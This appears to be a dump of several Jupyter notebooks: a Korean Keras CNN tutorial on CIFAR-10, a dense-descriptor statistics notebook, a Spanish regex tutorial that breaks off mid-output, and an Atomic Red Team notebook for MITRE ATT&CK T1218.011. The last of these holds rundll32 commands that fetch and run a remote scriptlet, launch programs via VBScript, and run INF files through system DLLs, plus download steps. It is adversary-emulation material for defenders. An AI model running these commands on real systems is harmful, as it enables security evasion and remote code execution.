datasets.cifar10.load_data()\nnb_classes = 10\ndata = DataSet(X, y, nb_classes)\nprint('data.input_shape', data.input_shape)", "(40000, 32, 32, 3) (40000, 1)\nX_train shape: (40000, 32, 32, 3)\n40000 train samples\n10000 test 
samples\ndata.input_shape (32, 32, 3)\n" ], [ "epochs=2\nbatch_size=128\nverbose=1\nhistory = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))", "Epoch 1/2\n313/313 [==============================] - 47s 150ms/step - loss: 2.3076 - accuracy: 0.1087 - val_loss: 2.2870 - val_accuracy: 0.1377\nEpoch 2/2\n313/313 [==============================] - 49s 158ms/step - loss: 2.2918 - accuracy: 0.1227 - val_loss: 2.2746 - val_accuracy: 0.1754\n" ] ], [ [ "### 4.3.4 분류 CNN의 학습 및 성능 평가를 위한 머신 클래스", "_____no_output_____" ], [ "4. 학습 및 성능 평가를 쉽게 수행할 수 있는 상위 개념 클래스인 Machine을 만듭니다. ", "_____no_output_____" ] ], [ [ "# 4. 분류 CNN의 학습 및 성능 평가를 위한 머신 클래스\nclass Machine():\n def __init__(self, X, y, nb_classes=2, fig=True):\n self.nb_classes = nb_classes\n self.set_data(X, y)\n self.set_model()\n self.fig = fig\n\n def set_data(self, X, y):\n nb_classes = self.nb_classes\n self.data = DataSet(X, y, nb_classes)\n print('data.input_shape', self.data.input_shape)\n\n def set_model(self):\n nb_classes = self.nb_classes\n data = self.data\n self.model = CNN(nb_classes=nb_classes)\n self.model.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy']) \n\n def fit(self, epochs=10, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n\n history = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))\n return history\n\n def run(self, epochs=100, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n fig = self.fig\n\n history = self.fit(epochs=epochs,\n batch_size=batch_size, verbose=verbose)\n\n score = model.evaluate(data.X_test, data.Y_test, verbose=0)\n\n print('Confusion matrix')\n Y_test_pred = model.predict(data.X_test, verbose=0)\n y_test_pred = np.argmax(Y_test_pred, axis=1)\n print(metrics.confusion_matrix(data.y_test, y_test_pred))\n\n 
print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\n # Save results\n suffix = sfile.unique_filename('datatime')\n foldname = 'output_' + suffix\n os.makedirs(foldname)\n skeras.save_history_history(\n 'history_history.npy', history.history, fold=foldname)\n model.save_weights(os.path.join(foldname, 'dl_model.h5'))\n print('Output results are saved in', foldname)\n\n if fig:\n plt.figure(figsize=(12, 4))\n plt.subplot(1, 2, 1)\n skeras.plot_acc(history)\n plt.subplot(1, 2, 2)\n skeras.plot_loss(history)\n plt.show()\n\n self.history = history\n\n return foldname", "_____no_output_____" ] ], [ [ "---\n### 4.3.5 분류 CNN을 처리하는 머쉰의 전체 코드", "_____no_output_____" ] ], [ [ "# File - keraspp/aicnn.py\n\n# 1. 분류 CNN 패키지 임포트 \nfrom sklearn import model_selection, metrics\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom keras import backend as K\nfrom keras.utils import np_utils\nfrom keras.models import Model\nfrom keras.layers import Input, Conv2D, MaxPooling2D, Flatten, Dense, Dropout\n\nfrom keraspp import skeras\nfrom keraspp import sfile\n\n# 2. 
분류 CNN 모델링\nclass CNN(Model):\n def __init__(self, nb_classes): #, in_shape=None):\n super(CNN,self).__init__() # added 2021-10-01\n self.nb_classes = nb_classes\n #self.in_shape = in_shape\n \n self.conv2D_A = Conv2D(32, kernel_size=(3, 3), activation='relu')\n self.conv2D_B = Conv2D(64, (3, 3), activation='relu')\n self.maxPooling2D_A = MaxPooling2D(pool_size=(2, 2))\n self.dropout_A = Dropout(0.25)\n self.flatten = Flatten()\n \n self.dense_A = Dense(128, activation='relu')\n self.dropout_B = Dropout(0.5)\n self.dense_B = Dense(nb_classes, activation='softmax', name='preds')\n \n def call(self, x):\n nb_classes = self.nb_classes\n # in_shape = self.in_shape\n\n #x = Input(in_shape)\n\n h = self.conv2D_A(x)\n h = self.conv2D_B(h)\n h = self.maxPooling2D_A(h)\n h = self.dropout_A(h)\n h = self.flatten(h)\n\n h = self.dense_A(h)\n h = self.dropout_B(h)\n\n y = self.dense_B(h)\n \n return y\n\n# 3. 분류 CNN을 위한 데이터 준비\nclass DataSet:\n def __init__(self, X, y, nb_classes, scaling=True, \n test_size=0.2, random_state=0):\n \"\"\"\n X is originally vector. 
Hence, it will be transformed\n to 2D images with a channel (i.e, 3D).\n \"\"\"\n self.X = X\n self.add_channels()\n\n X = self.X\n # the data, shuffled and split between train and test sets\n X_train, X_test, y_train, y_test = model_selection.train_test_split(\n X, y, test_size=0.2, random_state=random_state)\n\n print(X_train.shape, y_train.shape)\n\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n\n if scaling:\n # scaling to have (0, 1) for each feature (each pixel)\n scaler = MinMaxScaler()\n n = X_train.shape[0]\n X_train = scaler.fit_transform(\n X_train.reshape(n, -1)).reshape(X_train.shape)\n n = X_test.shape[0]\n X_test = scaler.transform(\n X_test.reshape(n, -1)).reshape(X_test.shape)\n self.scaler = scaler\n\n print('X_train shape:', X_train.shape)\n print(X_train.shape[0], 'train samples')\n print(X_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_test = np_utils.to_categorical(y_test, nb_classes)\n\n self.X_train, self.X_test = X_train, X_test\n self.Y_train, self.Y_test = Y_train, Y_test\n self.y_train, self.y_test = y_train, y_test\n # self.input_shape = input_shape\n\n def add_channels(self):\n X = self.X\n\n if len(X.shape) == 3:\n N, img_rows, img_cols = X.shape\n\n if K.image_dim_ordering() == 'th':\n X = X.reshape(X.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n X = X.reshape(X.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n else:\n input_shape = X.shape[1:] # channel is already included.\n\n self.X = X\n self.input_shape = input_shape \n \n# 4. 
분류 CNN의 학습 및 성능 평가를 위한 머신 클래스\nclass Machine():\n def __init__(self, X, y, nb_classes=2, fig=True):\n self.nb_classes = nb_classes\n self.set_data(X, y)\n self.set_model()\n self.fig = fig\n\n def set_data(self, X, y):\n nb_classes = self.nb_classes\n self.data = DataSet(X, y, nb_classes)\n print('data.input_shape', self.data.input_shape)\n\n def set_model(self):\n nb_classes = self.nb_classes\n data = self.data\n self.model = CNN(nb_classes=nb_classes)\n self.model.compile(loss='categorical_crossentropy',\n optimizer='adadelta', metrics=['accuracy']) \n\n def fit(self, epochs=10, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n\n history = model.fit(data.X_train, data.Y_train, \n batch_size=batch_size, epochs=epochs,\n verbose=verbose, \n validation_data=(data.X_test, data.Y_test))\n return history\n\n def run(self, epochs=100, batch_size=128, verbose=1):\n data = self.data\n model = self.model\n fig = self.fig\n\n history = self.fit(epochs=epochs,\n batch_size=batch_size, verbose=verbose)\n\n score = model.evaluate(data.X_test, data.Y_test, verbose=0)\n\n print('Confusion matrix')\n Y_test_pred = model.predict(data.X_test, verbose=0)\n y_test_pred = np.argmax(Y_test_pred, axis=1)\n print(metrics.confusion_matrix(data.y_test, y_test_pred))\n\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n\n # Save results\n suffix = sfile.unique_filename('datatime')\n foldname = 'output_' + suffix\n os.makedirs(foldname)\n skeras.save_history_history(\n 'history_history.npy', history.history, fold=foldname)\n model.save_weights(os.path.join(foldname, 'dl_model.h5'))\n print('Output results are saved in', foldname)\n\n if fig:\n plt.figure(figsize=(12, 4))\n plt.subplot(1, 2, 1)\n skeras.plot_acc(history)\n plt.subplot(1, 2, 2)\n skeras.plot_loss(history)\n plt.show()\n\n self.history = history\n\n return foldname", "_____no_output_____" ] ], [ [ "### 4.3.6 분류 CNN의 학습 및 성능 평가 수행", "_____no_output_____" ], [ "5. 
분류 CNN을 위한 머쉰에 기반하여 컬러 이미지를 분류합니다.", "_____no_output_____" ] ], [ [ "# 5. 분류 CNN의 학습 및 성능 평가 수행\nfrom keras import datasets\nimport keras\nassert keras.backend.image_data_format() == 'channels_last'\n\n# from keraspp import aicnn\nclass MyMachine(Machine):\n def __init__(self):\n (X, y), (x_test, y_test) = datasets.cifar10.load_data()\n super(MyMachine,self).__init__(X, y, nb_classes=10)\n\ndef main():\n m = MyMachine()\n m.run(epochs=2)\n\nmain()", "_____no_output_____" ] ], [ [ "---\n### 4.3.7 분류 CNN의 수행을 위한 전체 코드", "_____no_output_____" ] ], [ [ "# File - ex4_2_cnn_ficar10_cl-cpu.py\n\n# set to use CPU\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n# 5. 분류 CNN의 학습 및 성능 평가 수행\nfrom keras import datasets\nimport keras\nassert keras.backend.image_data_format() == 'channels_last'\nfrom keraspp import aicnn\n\n# from keraspp import aicnn\nclass MyMachine(aicnn.Machine):\n def __init__(self):\n (X, y), (x_test, y_test) = datasets.cifar10.load_data()\n super(MyMachine,self).__init__(X, y, nb_classes=10)\n\ndef main():\n m = MyMachine()\n m.run(epochs=2)\n\nmain()", "(40000, 32, 32, 3) (40000, 1)\nX_train shape: (40000, 32, 32, 3)\n40000 train samples\n10000 test samples\ndata.input_shape (32, 32, 3)\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72f9cc5db6020cb5856cc978756ef8a48c73b29
3,056
ipynb
Jupyter Notebook
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
jan-tgk/pytorch-dense-correspondence
7104f737768d34ad8eb6ff6aa65a01304c6a0e34
[ "BSD-3-Clause" ]
520
2018-06-25T00:46:38.000Z
2022-03-27T11:01:07.000Z
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
purplearrow/pytorch-dense-correspondence
584c934576342cf97d2f45777192f98118d2dfa7
[ "BSD-3-Clause" ]
66
2018-07-23T15:16:04.000Z
2021-08-10T13:40:25.000Z
dense_correspondence/evaluation/compute_descriptor_dataset_statistics.ipynb
purplearrow/pytorch-dense-correspondence
584c934576342cf97d2f45777192f98118d2dfa7
[ "BSD-3-Clause" ]
121
2018-06-26T13:52:03.000Z
2022-03-27T11:00:45.000Z
28.296296
110
0.611911
[ [ [ "## Compute descriptor statistics on dataset\nThis notebook computes the staistics of the descriptor on a given dataset", "_____no_output_____" ] ], [ [ "import numpy as np\nimport time\nimport os\nimport matplotlib.pyplot as plt\n\nimport dense_correspondence_manipulation.utils.utils as utils\nutils.add_dense_correspondence_to_python_path()\n\nfrom torchvision import transforms\nimport torch\n\nfrom dense_correspondence.dataset.spartan_dataset_masked import SpartanDataset\nfrom dense_correspondence.dataset.dense_correspondence_dataset_masked import ImageType\nfrom dense_correspondence.evaluation.evaluation import *\n\nDCE = DenseCorrespondenceEvaluation", "_____no_output_____" ], [ "%%javascript\nIPython.OutputArea.auto_scroll_threshold = 9999;", "_____no_output_____" ], [ "config_filename = os.path.join(utils.getDenseCorrespondenceSourceDir(), 'config', \n 'dense_correspondence', 'evaluation', 'evaluation.yaml')\nconfig = utils.getDictFromYamlFilename(config_filename)\ndefault_config = utils.get_defaults_config()\n\ndce = DenseCorrespondenceEvaluation(config)\n\n# Note: you must have a network with this name in your evaluation.yaml\nnetwork_name = \"caterpillar_3\"\ndcn = dce.load_network_from_config(network_name)\ndataset = dcn.load_training_dataset()\n\nutils.set_cuda_visible_devices(default_config['cuda_visible_devices'])", "_____no_output_____" ], [ "start_time = time.time()\nstats = DCE.compute_descriptor_statistics_on_dataset(dcn, dataset, num_images=100, save_to_file=True)\nelapsed = time.time() - start_time\nprint \"computing stats took %d seconds\" %(elapsed)\n\n\nprint \"entire img min\", stats['entire_image']['min']\nprint \"entire img max\", stats['entire_image']['max']\n\nprint \"mask img min\", stats['mask_image']['min']\nprint \"mask img max\", stats['mask_image']['max']", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72fa84e2cbd4280f43e685a751a8b1921525977
4,451
ipynb
Jupyter Notebook
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
12
2015-11-26T22:23:05.000Z
2021-03-23T21:10:53.000Z
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
1
2019-01-18T08:33:55.000Z
2019-01-18T08:33:55.000Z
pubmed/Update_Pub_table_with_Scores.ipynb
jasonost/clinicaltrials
b6d003b434e70cf4015215e4c9509df6092cfd97
[ "MIT" ]
4
2015-10-28T05:54:50.000Z
2019-05-09T22:23:11.000Z
25.58046
113
0.488205
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72fabd8bd13fbea1250fd293913f1042984c869
10,873
ipynb
Jupyter Notebook
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
8
2021-05-25T15:25:31.000Z
2021-11-08T07:14:45.000Z
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
1
2021-08-23T17:38:02.000Z
2021-10-12T06:58:19.000Z
playbook/tactics/defense-evasion/T1218.011.ipynb
haresudhan/The-AtomicPlaybook
447b1d6bca7c3750c5a58112634f6bac31aff436
[ "MIT" ]
2
2021-05-29T20:24:24.000Z
2021-08-05T23:44:12.000Z
50.808411
1,138
0.688494
[ [ [ "# T1218.011 - Signed Binary Proxy Execution: Rundll32\nAdversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", "_____no_output_____" ], [ "## Atomic Tests", "_____no_output_____" ] ], [ [ "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force", "_____no_output_____" ] ], [ [ "### Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject\nTest execution of a remote script using rundll32.exe. 
Upon execution notepad.exe will be opened.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 1", "_____no_output_____" ] ], [ [ "### Atomic Test #2 - Rundll32 execute VBscript command\nTest execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.\nTechnique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/\nUpon execution calc.exe will be launched\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 2", "_____no_output_____" ] ], [ [ "### Atomic Test #3 - Rundll32 advpack.dll Execution\nTest execution of a command using rundll32.exe with advpack.dll.\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml\nUpon execution calc.exe will be launched\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile 
\"PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 3 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe advpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 3", "_____no_output_____" ] ], [ [ "### Atomic Test #4 - Rundll32 ieadvpack.dll Execution\nTest execution of a command using rundll32.exe with ieadvpack.dll.\nUpon execution calc.exe will be launched\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 4 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe ieadvpack.dll,LaunchINFSection PathToAtomicsFolder\\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 4", "_____no_output_____" ] ], [ [ "### Atomic Test #5 - Rundll32 syssetup.dll Execution\nTest execution of a command using rundll32.exe with syssetup.dll. 
Upon execution, a window saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 5 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 5", "_____no_output_____" ] ], [ [ "### Atomic Test #6 - Rundll32 setupapi.dll Execution\nTest execution of a command using rundll32.exe with setupapi.dll. 
Upon execution, a windows saying \"installation failed\" will be opened\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml\n\n**Supported Platforms:** windows\n#### Dependencies: Run with `powershell`!\n##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 6 -GetPreReqs", "_____no_output_____" ] ], [ [ "#### Attack Commands: Run with `command_prompt`\n```command_prompt\nrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\\PathToAtomicsFolder\\T1218.011\\src\\T1218.011_DefaultInstall.inf\n```", "_____no_output_____" ] ], [ [ "Invoke-AtomicTest T1218.011 -TestNumbers 6", "_____no_output_____" ] ], [ [ "## Detection\nUse process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72fb28e02a4511e40072cc276b0697f3e3c6e52
376,010
ipynb
Jupyter Notebook
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
Materias/ProcesamientoLenguaje/Clases/S01_003_RE.ipynb
jorgeo80/UP_MDC
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
[ "MIT" ]
null
null
null
376,010
376,010
0.722989
[ [ [ "Importamos la libreria RE", "_____no_output_____" ] ], [ [ "import re", "_____no_output_____" ] ], [ [ "Para hacer pruebas y experimentos podemos utilizar el texto de la dirección: https://raw.githubusercontent.com/apimentelaUP/recursos/master/M%C3%A9xico_texto.txt", "_____no_output_____" ] ], [ [ "import requests\n\nurl = 'https://raw.githubusercontent.com/apimentelaUP/recursos/master/M%C3%A9xico_texto.txt'\npage = requests.get(url)\ntexto = page.text", "_____no_output_____" ], [ "texto", "_____no_output_____" ] ], [ [ "Recordemos que las ER son texto, y siempre y cuando no se incluya ninguno de los caracteres especiales, el texto formará una expresión regular que va a coincidir consigo mismo, asi se forman las ER mas simples.\n\nPara declarar una expresión regular, vamos a usar la función `re.compile()`", "_____no_output_____" ] ], [ [ "expresion_mexico = re.compile(r\"México\")", "_____no_output_____" ] ], [ [ "OJO: Presten atención a esa `'r'` justo antes de abrir las comillas del texto de la expresión regular, son importantes.\n\nEsa `'r'` le indica a Python que ese texto va a contener caracteres especiales de expresión regular. Python tiene caracteres especiales propios, de los cuáles varios coinciden con los de ER. Por lo tanto, si se omite la `'r'`, Python y la librería `re` se podrían \"pelear\" por ver a quién le corresponde esos símbolos. \n\nMejor usar la `'r'` para indicarle a Python que deje pasar el texto tal cual al intérprete de expresión regular. Para este caso en partícular no pasa nada, porque no hay tales símbolos, pero mejor hacerse la costumbre.", "_____no_output_____" ], [ "Podemos comenzar a usar esa expresión regular compilada para un proceso muy simple, buscarlo dentro del texto", "_____no_output_____" ] ], [ [ "busqueda = expresion_mexico.search(texto)\n\nprint(busqueda.group(0))", "México\n" ] ], [ [ "Y para sorpresa de nadie, lo que obtenemos es el mismo texto que queríamos buscar en primer lugar. 
Pero este ejemplo es importante para mostrar cómo se obtiene el resultado.\n\nPrimero, la función `er.search()` recibe el texto donde se va a buscar la expresión regular compilada y devuelve un resultado de esa búsqueda.\n\nPara poder observar la salida, necesitamos usar la función `.group(0)`. Mas adelante veremos como trabajar con los grupos de las expresiones regulares, pero por ahora simplemente confíen en mi que esa es la forma de obtener el resultado.", "_____no_output_____" ], [ "La función `er.search()` va a regresar únicamente la primer coincidencia que encuentre, si quieren encontrar todas, pueden usar la función `er.finditer()` para obtener un resultado iterable.", "_____no_output_____" ] ], [ [ "busqueda = expresion_mexico.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "México\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMé
xico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéx